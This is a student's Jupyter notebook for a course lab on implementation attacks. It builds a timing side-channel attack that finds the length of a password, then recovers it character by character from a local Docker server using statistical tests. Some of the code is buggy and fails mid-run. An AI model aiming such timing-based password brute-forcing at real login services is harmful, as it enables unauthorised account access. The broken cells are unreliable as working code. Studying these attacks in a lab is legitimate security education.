# Attacks on Implementations of Secure Systems Assignment 1

## Commands used for docker
```bash
docker pull amarmic/attacks_on_implementations:Assignment1_x86_64
docker run --name ass1 -p 80:8080 amarmic/attacks_on_implementations:Assignment1_x86_64
```

## Commands used for Anaconda to test locally
```bash
conda create --name side_attacks python=3.12
conda install requests
```


### Imports

In [2]:
%pip install scipy
%pip install requests

   ---------------------------------------- 0.0/41.0 MB ? eta -:--:--
   - -------------------------------------- 1.0/41.0 MB 6.0 MB/s eta 0:00:07
   ---- ----------------------------------- 4.5/41.0 MB 12.8 MB/s eta 0:00:03
   -------- ------------------------------- 8.4/41.0 MB 15.1 MB/s eta 0:00:03
   ------------- -------------------------- 13.4/41.0 MB 17.4 MB/s eta 0:00:02
   ---------------- ----------------------- 17.3/41.0 MB 17.9 MB/s eta 0:00:02
   --------------------- ------------------ 22.0/41.0 MB 18.9 MB/s eta 0:00:02
   ------------------------- -------------- 26.0/41.0 MB 18.9 MB/s eta 0:00:01
   ---------------------------- ----------- 29.4/41.0 MB 18.6 MB/s eta 0:00:01
   -------------------------------- ------- 33.0/41.0 MB 18.4 MB/s eta 0:00:01
   ----------------------------------- ---- 36.7/41.0 MB 18.5 MB/s eta 0:00:01
   ---------------------------------------  40.9/41.0 MB 18.6 MB/s eta 0:00:01
   ---------------------------------------- 41.0/41.0 MB 18.4 MB/

In [3]:
import requests
import time
from scipy import stats

### Constants

In [ ]:
base_url = "http://localhost"
name = "208009845"
difficulty = "1" # const for first difficuly
max_PASSWORD_LENGTH = 32
amount_of_repeats = 3
possible_chars = "abcdefghijklmnopqrstuvwxyz"


## Solution for difficulty 1
With difficulty 1, the password length is variable, so we need first to find the length.


In [29]:
password = "parshandata"
response = requests.get(f"{base_url}/?user={name}&password={password}")
print("Response: ", response.url)
if response.status_code != 200 : # sanity check
  print("Error: ", response.status_code)

if response.text == "1":
   print("correct password")
else:
   print("incorrect password")

Response:  http://localhost/?user=208009845&password=parshandata
correct password


In [9]:
# Find length of password
# here we save the time of the query for each password length
vector_iterations = [[] for _ in range(max_PASSWORD_LENGTH-1)]
for PASSWORD_LENGTH in range(1,max_PASSWORD_LENGTH): 
  password = "a" * PASSWORD_LENGTH
  for iteration in range(amount_of_repeats):
    start = time.time()
    response = requests.get(f"{base_url}/?user={name}&password={password}")#&difficulty={difficulty}")
    end = time.time()
    if response.status_code != 200: # sanity check
      print("Error: ", response.status_code)
      break
    time_of_query = end - start
    vector_iterations[PASSWORD_LENGTH-1].append(time_of_query)

# calculate avg time for each password length
PASSWORD_LENGTH, max_avg = 0, 0
for i in range(len(vector_iterations)):
  vector_iterations[i] = sum(vector_iterations[i]) / len(vector_iterations[i])
  if vector_iterations[i] > max_avg:
    max_avg = vector_iterations[i]
    PASSWORD_LENGTH = i+1
  
print(f"Password length: {PASSWORD_LENGTH}, Time: {vector_iterations[PASSWORD_LENGTH-1]}")

Password length: 11, Time: 0.5066157182057699


In [4]:
import numpy as np

min_letters = 5
alpha = 0.0005
amount_of_repeats = 3

def majority_t_test(data, popmean):
  majority_list = []
  for iteration in range(amount_of_repeats):
    if t_test(data, popmean[iteration]):
      majority_list.append(True)
    else:
      majority_list.append(False)
  if majority_list.count(True) > amount_of_repeats // 2:
    return True
  return False
  
def t_test(data, popmean):
  flat_list = [item for sublist in data for item in sublist]
  t_stat, p_val = stats.ttest_1samp(flat_list, popmean, alternative='less')
  if p_val < alpha:
    return True
  return False

def remove_outliers(data):
    q25, q75 = np.percentile(data, 25), np.percentile(data, 75)
    iqr = q75 - q25
    return [x for x in data if (x <= q75 + 1.5 * iqr)]


def get_dynamic_alpha(password_so_far, min_alpha=0.005, max_alpha=0.0001):
    """
    Calculate a dynamic alpha value that becomes more strict as we discover more characters.
    
    Args:
        password_so_far: Currently discovered partial password
        min_alpha: Minimum allowed alpha value (lower bound)
        max_alpha: Maximum allowed alpha value (upper bound)
    
    Returns:
        Dynamically calculated alpha value
    """
    # Exponential decrease in alpha as password length increases
    # We become more strict (require stronger evidence) as we progress
    return max(min_alpha, max_alpha * (0.7 ** len(password_so_far)))
    
def find_password():
  password = "" # password to return
  while (len(password) <= PASSWORD_LENGTH):
    max_time_index, max_time = 0, 0
    vector_iterations = [[] for _ in range(len(possible_chars))]
    current_index_of_password = len(password) #what index we are trying to brute force
    for index_char_to_check in range(len(possible_chars)):
      print(possible_chars[index_char_to_check], end="") #for debugging purposes
      password_to_check = password + possible_chars[index_char_to_check] * (PASSWORD_LENGTH - current_index_of_password)
      for _ in range(amount_of_repeats):
        start = time.time()
        response = requests.get(f"{base_url}/?user={name}&password={password_to_check}")#&difficulty={difficulty}")
        end = time.time()
        if response.status_code == 200 and response.text == "1":
          return password_to_check
        vector_iterations[index_char_to_check].append(end - start)

        # perform t-test to see if it's an small outlier 
        #TODO
    
      #vector_iterations[index_char_to_check] = remove_outliers_and_avg(vector_iterations[index_char_to_check])

      


      if max(vector_iterations[index_char_to_check]) > max_time:
        max_time = max(vector_iterations[index_char_to_check])
        max_time_index = index_char_to_check
      

      if index_char_to_check == min_letters-1:
        found = False
        for i in range(min_letters):
          sample = vector_iterations[:i] + vector_iterations[i+1:min_letters]
          if majority_t_test(sample, vector_iterations[i]):
            password += possible_chars[i]
            print(f"\nPassword: {password}, time: {vector_iterations[i]}") #,p-value: {p_val}
            print(vector_iterations[:index_char_to_check+1])
            found = True
        if found: break
        else: continue

      # t-test
      if index_char_to_check > min_letters -1 and max_time_index == index_char_to_check:
        sample = vector_iterations[:index_char_to_check]
        if majority_t_test(sample, vector_iterations[index_char_to_check]):
          password += possible_chars[index_char_to_check]
          print(f"\nPassword: {password}, time: {vector_iterations[index_char_to_check]}") #,p-value: {p_val}
          print(vector_iterations[:index_char_to_check+1])
          break   
        
      
    else: #go back a letter  
        password = password[:-1]
        print("We did not find a char, the new password is: ", password)
  else:
    return "NOT_FOUND"

password = find_password()
print(f"Password: {password}")



NameError: name 'password_length' is not defined

In [ ]:
import time
import string
import requests
from statistics import median, stdev
from datetime import datetime

BASE_URL = "http://localhost"
USERNAME = "208009845"
CHARSET = string.ascii_lowercase
CHARSET_LENGTH = 26
REPEATS = 1
MIN_SAMPLES_FOR_EARLY_STOP = 5
PASSWORD_LENGTH = 11
DIFFICULTY = 0

def time_request(password_guess):
    if DIFFICULTY == 0:
        url = f"{BASE_URL}/?user={USERNAME}&password={password_guess}"
    else:
        url = f"{BASE_URL}/?user={USERNAME}&password={password_guess}&difficulty={DIFFICULTY}"
    start = time.time()
    response = requests.get(url)
    end = time.time()
    return end - start, response.text.strip()

def log_result(password, password_tries, time):
    with open('results.txt','a') as f:
        now = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
        LOCAL = "localhost" in BASE_URL or "127.0.0.1" in BASE_URL
        f.write(f"name: {USERNAME}, local: {LOCAL}, password length: {PASSWORD_LENGTH}, difficulty: {DIFFICULTY}, repeats: {REPEATS}, password: {password}, time: {int(time)//60}m{int(time)%60}s, passwword tries: {password_tries}, logged at: {now}\n")

def guess_password():
    start_time_all_password = time.time()
    guessed_password = ""
    password_tries = 0 
    min_margin_seconds = 0.25  # minimum difference between top 2 medians to trigger early stop
    print(f"\n[+] Guessing character at position 1")
    timings = []
    timings_per_position = []
    indexes_list = []
    for i, c in enumerate(CHARSET):
        trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)
        times_list = []
        for _ in range(REPEATS):
            response_time, response = time_request(trial)
            if response == "1":
                log_result(trial, password_tries, time.time() - start_time_all_password)
                return trial
            times_list.append(pow((response_time + 5), 2))
        med_time = median(times_list)
        timings.append((med_time, c))

        print(f"    Tried '{trial}' | Median Time: {med_time:.5f}s")

    # Early stopping based on timing separation from second best
    timings = sorted(timings, reverse=True)
    best_timing, best_char = timings[0]
    second_best_timing, _ = timings[1]
    third_best_timing, _ = timings[2]
    min_margin_seconds = (((best_timing - second_best_timing) + (best_timing - third_best_timing)) / 2) * 0.5
    password_tries += (i + 1)*REPEATS
    timings_per_position.append(timings)
    if best_timing - second_best_timing > min_margin_seconds:
        print(f"[✓] Early outlier: '{best_char}' (margin {best_timing - second_best_timing:.5f}s > {min_margin_seconds}s)")
        guessed_password += best_char
    else:
        # No early stopping — pick the best overall
        indexes_list.append(0)
        best_char = max(timings, key=lambda x: x[0])[1] 
    position = 1
    while True:
        # for position in range(1, PASSWORD_LENGTH - 1):
        if position <= PASSWORD_LENGTH:
            print(f"\n[+] Guessing character at position {position + 1}")
            timings = []
            min_samples_to_early_stop = 3 if position <= 10 else 5
            
            for i, c in enumerate(CHARSET):
                trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)

                #times_list = [time_request(trial)[0] for _ in range(REPEATS)]
                times_list = []
                for _ in range(REPEATS):
                    response_time, response = time_request(trial)
                    if response == "1":
                        log_result(trial, password_tries, time.time() - start_time_all_password)
                        return trial
                    times_list.append(pow((response_time + 5), 2))
                med_time = median(times_list)
                timings.append((med_time, c))

                print(f"    Tried '{trial}' | Median Time: {med_time:.5f}s")

                # Early stopping based on timing separation from second best
                if i + 1 >= min_samples_to_early_stop:
                    timings = sorted(timings, reverse=True)
                    best_timing, best_char = timings[0]
                    second_best_timing, _ = timings[1]

                    if best_timing - second_best_timing > min_margin_seconds:
                        print(f"[✓] Early outlier: '{best_char}' (margin {best_timing - second_best_timing:.5f}s > {min_margin_seconds}s)")
                        guessed_password += best_char
                        timings_per_position.append(timings)
                        password_tries += (i + 1)*REPEATS
                        break
                if i == CHARSET_LENGTH: #didn't found any char
                    # No early stopping — pick the best overall
                    timings_per_position.append(timings)
                    indexes_list.append(position)
                    best_timing, best_char = timings[0]
                    print(
                        f"selected the max outlier: '{best_char}' (time: {best_timing:.5f}s")
                    guessed_password += best_char
                    password_tries += (i + 1)*REPEATS
        else: # Last iteration
            print(f"\n[+] Guessing character at position {position + 1}")

        
            # for i, c in enumerate(CHARSET):
            #     trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)

            #     _, output = time_request(trial)
            #     if output == "1":
            #         password_tries += (i + 1)*REPEATS
            #         log_result(trial, password_tries, time.time() - start_time_all_password)
            #         return trial
            #     print(f"    Tried '{trial}'")
            
            for i in indexes_list:
                _ , second_best_char = timings_per_position[i][1]
                _ , third_best_char = timings_per_position[i][2]
                trail1 = trail2 = trail
                trail1[i] = second_best_char
                _, output1 = time_request(trial1)
                if output1 == "1":
                    password_tries += (i + 1)*REPEATS
                    log_result(trial, password_tries, time.time() - start_time_all_password)
                    return trial
                trail2[i] = third_best_char
                _, output2 = time_request(trial)
                
                print(f"    Tried '{trial}'")

    


if __name__ == "__main__":
    password = guess_password()
    
    print(f"\n[✓] The password is {password}")

# to calculate the median instead of avg
# at first find the difference between the max and the min and define as the margin
# each time we multiply the margin by let's say 0.8/0.85
# calc at least 3 or 5 chars to determine the result


[+] Guessing character at position 1
    Tried 'aaaaaaaaaaa' | Median Time: 30.31188s
    Tried 'baaaaaaaaaa' | Median Time: 30.33250s
    Tried 'caaaaaaaaaa' | Median Time: 30.34495s
    Tried 'daaaaaaaaaa' | Median Time: 30.32755s


KeyboardInterrupt: 